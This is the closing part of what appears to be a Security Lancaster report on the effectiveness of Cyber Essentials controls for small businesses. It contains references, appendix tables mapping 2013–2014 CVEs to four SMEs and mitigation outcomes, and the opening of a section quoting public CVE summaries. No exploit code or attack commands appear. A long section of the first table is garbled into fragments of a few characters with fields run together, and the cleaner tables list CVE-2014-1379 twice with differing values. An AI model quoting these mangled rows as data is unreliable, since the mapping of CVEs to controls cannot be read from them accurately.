[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-'-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160, aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271, aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077, aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyb

erC

ontr

ols

App

licab

ility

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-0

00

8y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(U

ser

Po

licy)

A

nti

-Mal

war

eC

VE

-20

13

-00

22

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-00

84

yy

yn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-0

14

0y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

14

9n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-01

72

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-U

ser

Acc

ess

(Str

on

gP

assw

ord

)P

atch

Man

agem

ent

CV

E-2

01

3-0

17

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-01

99

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

ampS

ecu

reC

on

fig

ura

tio

nC

VE

-20

13

-02

53

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Ser

ver)

CV

E-2

01

3-0

27

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

48

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

59

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

61

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

63

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Fir

mw

are

Man

agem

ent

CV

E-2

01

3-0

64

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

sin

g)

Pat

chM

anag

emen

tC

VE

-20

13

-07

46

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-07

53

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-07

87

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-0

90

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

03

5y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-1

10

2n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-11

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-1

14

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

15

3y

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

18

1n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-13

03

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-13

84

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

CV

E-2

01

3-1

38

8n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-1

45

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-1

47

2y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Acc

ess

Po

licy)

CV

E-2

01

3-1

55

3y

ny

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

62

0y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-1

62

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

63

8y

yy

yn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

66

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

67

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-1

70

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

13

-17

34

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-17

77

nn

yn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Pat

chM

anag

emen

tC

VE

-20

13

-23

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

C

VE

-20

13

-23

40

nn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

3-2

35

0n

yn

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

ampF

irew

all

CV

E-2

01

3-2

49

2y

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-25

07

yn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Fir

mw

are

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

3-2

73

6y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-2

78

0n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-28

03

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

Pat

chM

anag

emen

tsC

VE

-20

13

-28

24

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-2

82

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-29

20

ny

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

13

-30

64

yn

nn

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

16

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

37

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eS

ecu

reC

on

fig

ura

tio

n(D

on

rsquotIn

stal

l)C

VE

-20

13

-31

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-31

99

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

01

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

06

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-32

80

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tamp

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

3-3

38

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n

Pat

chM

anag

emen

tC

VE

-20

13

-34

17

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

W

ebsi

teB

lack

listi

ng

CV

E-2

01

3-3

63

2y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Acc

ess

Po

licy

(Str

on

gP

assw

ord

)F

irew

all

CV

E-2

01

3-3

65

6n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

85

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

An

ti-M

alw

are

CV

E-2

01

3-3

86

0y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

3-3

89

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

ecu

reC

on

fig

ura

tio

n-

no

JS

CV

E-2

01

3-3

89

7y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Web

site

Bla

cklis

tin

gC

VE

-20

13

-39

00

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-3

90

5y

yn

yn

No

tM

itig

ated

No

tM

itig

ated

-S

ecu

reC

on

fig

ura

tio

n(D

on

rsquotin

stal

l)C

VE

-20

13

-42

23

yn

nn

nN

ot

Mit

igat

edN

ot

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

(Do

nrsquot

inst

all)

CV

E-2

01

3-4

43

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

3-4

47

| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| …8 (row continued from previous page) | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration |
| CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration |
| CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration |
| CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration |
| CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall |
| CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28

| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion) |
| CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management |
| CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration |
| CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management |
| CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management |
| CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS |
| CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL |
| CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management |
| CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware |
| CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management |
| CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting) |
| CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management |
| CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware |
| CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control |
| CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing) |
| CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control |
| CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management |
| CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management |
| CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management |


| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management |
| CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management |
| CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |


| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |


CVE Details

CVE-2013-0008
"win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability.""

CVE-2013-0022
"Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability.""

CVE-2013-0084
"Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability.""

CVE-2013-0140
